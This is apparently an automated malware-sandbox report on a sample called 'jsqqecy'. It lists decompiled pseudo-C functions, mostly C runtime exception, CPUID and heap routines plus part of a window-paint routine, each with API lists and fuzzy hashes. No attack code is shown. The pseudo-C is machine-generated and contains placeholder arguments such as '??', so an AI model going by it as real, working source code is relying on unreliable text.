                          0x00bd544f
                          0x00000000
                          0x00bd544f
                          0x00bd53fa
                          0x00bd53fa
                          0x00bd53ff
                          0x00000000
                          0x00bd5401
                          0x00bd5401
                          0x00bd5402
                          0x00bd5404
                          0x00bd5407
                          0x00bd540c
                          0x00bd53ff
                          0x00bd550e
                          0x00bd551c

                          APIs
                          • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BD5442
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00BD54BD
                          • FindClose.KERNEL32(00000000), ref: 00BD54DF
                          • FindClose.KERNEL32(00000000), ref: 00BD5502
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: Find$CloseFile$FirstNext
                          • String ID:
                          • API String ID: 1164774033-0
                          • Opcode ID: 75c1cfcc04661c3bbec8b82324dc35a1b62f1ea69883c8a34113ff61d83d2d71
                          • Instruction ID: 2464214f19c9761acd8592bfd5fd24200a0b71ce344ef28ea14a961596cf3e2a
                          • Opcode Fuzzy Hash: 75c1cfcc04661c3bbec8b82324dc35a1b62f1ea69883c8a34113ff61d83d2d71
                          • Instruction Fuzzy Hash: E741A271900919AFDB30DF68DC89AAEF7F9EB84355F1081E6E40597344FA309E848F61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BCD78C Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                          Download Yara Rule
                          C-Code - Quality: 85%
                          			E00BCD78C(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E00BCD700(_t34);
				 *_t60 = 0x2cc;
				_v632 = E00BCFC90(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E00BCFC90(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E00BCD700(_t49);
				}
				return _t49;
			}


































                          0x00bcd78c
                          0x00bcd78c
                          0x00bcd78c
                          0x00bcd7a0
                          0x00bcd7a2
                          0x00bcd7a5
                          0x00bcd7a5
                          0x00bcd7a9
                          0x00bcd7ae
                          0x00bcd7c6
                          0x00bcd7cc
                          0x00bcd7d2
                          0x00bcd7d8
                          0x00bcd7de
                          0x00bcd7e4
                          0x00bcd7ea
                          0x00bcd7f1
                          0x00bcd7f8
                          0x00bcd7ff
                          0x00bcd806
                          0x00bcd80d
                          0x00bcd814
                          0x00bcd815
                          0x00bcd81e
                          0x00bcd824
                          0x00bcd827
                          0x00bcd82d
                          0x00bcd83c
                          0x00bcd848
                          0x00bcd853
                          0x00bcd85a
                          0x00bcd861
                          0x00bcd86c
                          0x00bcd874
                          0x00bcd87d
                          0x00bcd87f
                          0x00bcd882
                          0x00bcd884
                          0x00bcd88e
                          0x00bcd896
                          0x00bcd89c
                          0x00000000
                          0x00bcd8a3
                          0x00bcd8a6

                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00BCD798
                          • IsDebuggerPresent.KERNEL32 ref: 00BCD864
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BCD884
                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00BCD88E
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                          • String ID:
                          • API String ID: 254469556-0
                          • Opcode ID: 4be5f0758baf783e0949aeca35ba956c5b5306a1b09f0b246cea2afb22e0d3cc
                          • Instruction ID: ea7e3a4fbeaefdc7ae339ae80b2a2dac15500ea854a3a5231e771ab819eb7302
                          • Opcode Fuzzy Hash: 4be5f0758baf783e0949aeca35ba956c5b5306a1b09f0b246cea2afb22e0d3cc
                          • Instruction Fuzzy Hash: 8D310579D412189BDB11EFA4D989BCDBBF8EF08304F1041EAE40DAB250EB719A848F45
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BD383A Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 79%
                          			E00BD383A(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0xbe4050; // 0xe9e688dc
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00BCD700(_t41);
					_pop(_t61);
				}
				E00BCFC90(_t66,  &_v804, 0, 0x50);
				E00BCFC90(_t66,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t25 =  &_v0; // 0x4
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // -808
				if(UnhandledExceptionFilter(_t36) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E00BCD700(_t57);
				}
				return E00BCDB85(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
			}






































                          0x00bd383a
                          0x00bd383a
                          0x00bd383a
                          0x00bd3845
                          0x00bd384a
                          0x00bd384c
                          0x00bd3854
                          0x00bd3856
                          0x00bd3859
                          0x00bd385e
                          0x00bd385e
                          0x00bd386a
                          0x00bd387d
                          0x00bd388b
                          0x00bd3891
                          0x00bd3897
                          0x00bd389d
                          0x00bd38a3
                          0x00bd38a9
                          0x00bd38af
                          0x00bd38b5
                          0x00bd38bb
                          0x00bd38c1
                          0x00bd38c8
                          0x00bd38cf
                          0x00bd38d6
                          0x00bd38dd
                          0x00bd38e4
                          0x00bd38eb
                          0x00bd38ec
                          0x00bd38f5
                          0x00bd38fb
                          0x00bd38fb
                          0x00bd38fe
                          0x00bd3904
                          0x00bd3911
                          0x00bd391a
                          0x00bd3923
                          0x00bd392c
                          0x00bd393a
                          0x00bd393c
                          0x00bd3942
                          0x00bd3951
                          0x00bd395d
                          0x00bd3960
                          0x00bd3965
                          0x00bd3972

                          APIs
                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00BD3932
                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00BD393C
                          • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,?), ref: 00BD3949
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                          • String ID:
                          • API String ID: 3906539128-0
                          • Opcode ID: 4dd57bd539c1428ff6d82e4070376f4c0218775228df9a9ce4732c2c29059a8f
                          • Instruction ID: 53adf9e407bc9647795cdcf9a52395970c75367264560e6a996200437e1dbd48
                          • Opcode Fuzzy Hash: 4dd57bd539c1428ff6d82e4070376f4c0218775228df9a9ce4732c2c29059a8f
                          • Instruction Fuzzy Hash: AA31A2759012189BCB21DF68D989B89BBF8FF08710F5045EAE41CA7251EB749B818F45
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BCD9A5 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                          Download Yara Rule
                          C-Code - Quality: 88%
                          			E00BCD9A5(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t104;

				_t90 = __edx;
				 *0xbe5aa0 =  *0xbe5aa0 & 0x00000000;
				 *0xbe4058 =  *0xbe4058 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v8 = _v28 ^ 0x49656e69;
				_v12 = _v32 ^ 0x6c65746e;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
					L9:
					_t96 =  *0xbe5aa4;
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0xbe5aa4 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0xbe4058; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0xbe5aa0 = 1;
					 *0xbe4058 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0xbe5aa0 = 2;
						 *0xbe4058 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0xbe4058; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0xbe5aa0 = 3;
								 *0xbe4058 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0xbe5aa0 = 5;
									 *0xbe4058 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0xbe4058 =  *0xbe4058 | 0x00000040;
										 *0xbe5aa0 = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t96 =  *0xbe5aa4 | 0x00000001;
					 *0xbe5aa4 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}





























                          0x00bcd9a5
                          0x00bcd9a8
                          0x00bcd9b2
                          0x00bcd9c3
                          0x00bcdb75
                          0x00bcdb78
                          0x00bcdb78
                          0x00bcd9c9
                          0x00bcd9cf
                          0x00bcd9d4
                          0x00bcd9d8
                          0x00bcd9dc
                          0x00bcd9de
                          0x00bcd9e0
                          0x00bcd9e3
                          0x00bcd9e8
                          0x00bcd9f1
                          0x00bcda02
                          0x00bcda0d
                          0x00bcda13
                          0x00bcda14
                          0x00bcda1a
                          0x00bcda1d
                          0x00bcda27
                          0x00bcda2a
                          0x00bcda2d
                          0x00bcda30
                          0x00bcda75
                          0x00bcda75
                          0x00bcda7b
                          0x00bcda7b
                          0x00bcda80
                          0x00bcda81
                          0x00bcda87
                          0x00bcdab9
                          0x00bcda89
                          0x00bcda8b
                          0x00bcda8c
                          0x00bcda92
                          0x00bcda95
                          0x00bcda97
                          0x00bcda9a
                          0x00bcda9d
                          0x00bcdaa0
                          0x00bcdaa3
                          0x00bcdaac
                          0x00bcdab1
                          0x00bcdab1
                          0x00bcdaac
                          0x00bcdabc
                          0x00bcdac1
                          0x00bcdac4
                          0x00bcdace
                          0x00bcdad9
                          0x00bcdadf
                          0x00bcdae2
                          0x00bcdaec
                          0x00bcdaf7
                          0x00bcdb03
                          0x00bcdb06
                          0x00bcdb09
                          0x00bcdb14
                          0x00bcdb19
                          0x00bcdb1b
                          0x00bcdb20
                          0x00bcdb23
                          0x00bcdb2d
                          0x00bcdb35
                          0x00bcdb3a
                          0x00bcdb44
                          0x00bcdb52
                          0x00bcdb65
                          0x00bcdb6c
                          0x00bcdb6c
                          0x00bcdb52
                          0x00bcdb35
                          0x00bcdb19
                          0x00bcdaf7
                          0x00000000
                          0x00bcdb74
                          0x00bcda35
                          0x00bcda3f
                          0x00bcda6a
                          0x00bcda6d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000

                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00BCD9BB
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: FeaturePresentProcessor
                          • String ID:
                          • API String ID: 2325560087-0
                          • Opcode ID: 1a420c7bd805ce642a7f79ad8d5e03dc4a46e61ac74adb899e7cd84c8f882cac
                          • Instruction ID: 88a4db1a2f70a292638ed8c6f8331db6121d178dd5b68ad68303297e27068e80
                          • Opcode Fuzzy Hash: 1a420c7bd805ce642a7f79ad8d5e03dc4a46e61ac74adb899e7cd84c8f882cac
                          • Instruction Fuzzy Hash: 79518AB6A046458FEB24CF58E8C1BAABBF0FB48314F2581BED515EB261DB749D40CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BCB890 Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: KeyboardState
                          • String ID:
                          • API String ID: 1724228437-0
                          • Opcode ID: e27196080b2c7467b206d0b14b9605cf0198e8b79ebc1ef430908b119c96e5b5
                          • Instruction ID: a134494b6c3e5b1e5106efec095e69fef932f456a63934ef9e600e6622536ab7
                          • Opcode Fuzzy Hash: e27196080b2c7467b206d0b14b9605cf0198e8b79ebc1ef430908b119c96e5b5
                          • Instruction Fuzzy Hash: 91318871A14248AFEB91CFA8C596BAC7BF0FB01301F1844A5E4D9DF291D238DB94EB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BD25EB Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00BD25EB() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0xbe62dc = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                          0x00bd25eb
                          0x00bd25f3
                          0x00bd25fb

                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: HeapProcess
                          • String ID:
                          • API String ID: 54951025-0
                          • Opcode ID: 778680108bf524acf55053b3bd250e8817408cc0602504e4a9f5c2f9d8f15b8d
                          • Instruction ID: 305d47a09be3d752b10dc51656ebe16e2695d7c3964b8b86f9ef472f067bc4e9
                          • Opcode Fuzzy Hash: 778680108bf524acf55053b3bd250e8817408cc0602504e4a9f5c2f9d8f15b8d
                          • Instruction Fuzzy Hash: 7BA011302022808F83008F3AAE882083BA8AA802C0B088028A000CE020EE3088A0AF00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BD41ED Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00BD41ED(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E00BD2389(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}






                          0x00bd41fa
                          0x00bd41fc
                          0x00bd41ff
                          0x00bd4202
                          0x00bd4205
                          0x00bd4216
                          0x00bd4218
                          0x00bd4207
                          0x00bd420b
                          0x00bd4214
                          0x00000000
                          0x00000000
                          0x00bd4214
                          0x00bd421d

                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d2ad5c32dc7646e2450354e1ffd7f211a2991837c3e3f6e2b6b4411862f7e83d
                          • Instruction ID: 22c620553d5337508c4cfb1fad36952736431ff47284c7a6d39fe17882fbe13f
                          • Opcode Fuzzy Hash: d2ad5c32dc7646e2450354e1ffd7f211a2991837c3e3f6e2b6b4411862f7e83d
                          • Instruction Fuzzy Hash: F6E08C32921228EBCB14DBC8C90498AF3ECEB45B10B16459BB501D3200D270DE00C7D0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BD00FE Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00BD00FE(void* __ecx, void* __eflags) {

				if(E00BD41ED(__ecx) == 1 || ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) != 0) {
					return 0;
				} else {
					return 1;
				}
			}



                          0x00bd0106
                          0x00bd011f
                          0x00bd011a
                          0x00bd011c
                          0x00bd011c

                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a70851e5609c448e8c58597b19ee992f77326b5201e67141dc45e8f64a1dd04d
                          • Instruction ID: 71b380a814c58f4d9df24ecfbdd74f684c49c75451d95f4e4506a00258fa9d67
                          • Opcode Fuzzy Hash: a70851e5609c448e8c58597b19ee992f77326b5201e67141dc45e8f64a1dd04d
                          • Instruction Fuzzy Hash: BCC08C38C1094847CE2DA91086723A4B3D4E3A1BC6F8004CED4121BB42E62E9C82DF02
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BCBF90 Relevance: 42.3, APIs: 28, Instructions: 296COMMON
                          Download Yara Rule

                          Control-flow Graph

                          C-Code - Quality: 48%
                          			E00BCBF90(struct HWND__* _a4, int _a8, int _a12, signed int _a16) {
				long _v12;
				long _v16;
				struct tagPAINTSTRUCT _v80;
				struct tagRECT _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				void* _v124;
				void* _v128;
				intOrPtr _v132;
				long _v136;
				signed int _v140;
				void* _v144;
				struct tagRECT _v156;
				intOrPtr _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				void* _v176;
				void* _v180;
				void* _v184;
				signed int* _v188;
				void* _v204;
				RECT* _v208;
				intOrPtr _v212;
				signed int _v216;
				signed int _v228;
				signed int _v232;
				signed int _v240;
				intOrPtr _v244;
				void* _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v276;
				signed int _v280;
				void* _v292;
				void* _v296;
				int _t176;
				long _t186;
				struct HBRUSH__* _t208;
				long _t214;
				void* _t218;
				intOrPtr _t236;
				void* _t245;
				void* _t326;
				struct HDC__** _t330;
				struct HDC__** _t332;
				struct HDC__** _t336;
				struct HDC__** _t337;
				struct HDC__** _t338;
				struct HDC__** _t341;
				struct HDC__** _t342;
				void* _t343;
				struct HDC__** _t344;

				_t176 = _a8;
				_v160 = _t176;
				if(_t176 == 0xf) {
					BeginPaint(_a4,  &_v80);
					GetClientRect(_a4,  &_v96);
					asm("cdq");
					_v120 = _v96.right / 8;
					_t186 = GetWindowLongW(GetParent(_a4), 8);
					_t330 = _t326 - 0xfffffffffffffff4;
					_v16 = _t186;
					_v116 = 0;
					while(_v116 < 0x10) {
						asm("cdq");
						_v168 = _v116 / 8;
						asm("cdq");
						_v108 = _v168 * _v96.bottom / 2;
						_v164 = _v108;
						asm("cdq");
						_v100 = _v164 + _v96.bottom / 2;
						_v112 = (_v116 & 0x00000007) * _v120;
						_v104 = _v112 + _v120;
						_t208 = CreateSolidBrush( *(_v16 + 4 + _v116 * 4));
						_t332 = _t330 - 4;
						_v124 = _t208;
						 *_t332 = _v80.hdc;
						_v188 =  &_v112;
						_v184 = _v124;
						FillRect(??, ??, ??);
						DeleteObject(_v124);
						_t214 = GetWindowLongW(_a4, 0);
						_t330 = _t332;
						if(_t214 == _v116) {
							_v132 = 2;
							_t218 = SelectObject(_v80.hdc, GetStockObject(6));
							_t336 = _t330 - 0xfffffffffffffffc;
							_v128 = _t218;
							_v104 = _v104 + 0xffffffff;
							_v100 = _v100 + 0xffffffff;
							while(1) {
								 *_t336 = _v80.hdc;
								_v216 = _v112;
								_v212 = _v100;
								_v208 = 0;
								MoveToEx(??, ??, ??, ??);
								_t337 = _t336 - 0x10;
								 *_t337 = _v80.hdc;
								_v232 = _v112;
								_v228 = _v108;
								LineTo(??, ??, ??);
								_t338 = _t337 - 0xc;
								 *_t338 = _v80.hdc;
								_v244 = _v104;
								_v240 = _v108;
								LineTo(??, ??, ??);
								SelectObject(_v80.hdc, GetStockObject(7));
								_t341 = _t338;
								 *_t341 = _v80.hdc;
								_v268 = _v104;
								_v264 = _v100;
								LineTo(??, ??, ??);
								_t342 = _t341 - 0xc;
								 *_t342 = _v80.hdc;
								_v280 = _v112;
								_v276 = _v100;
								LineTo(??, ??, ??);
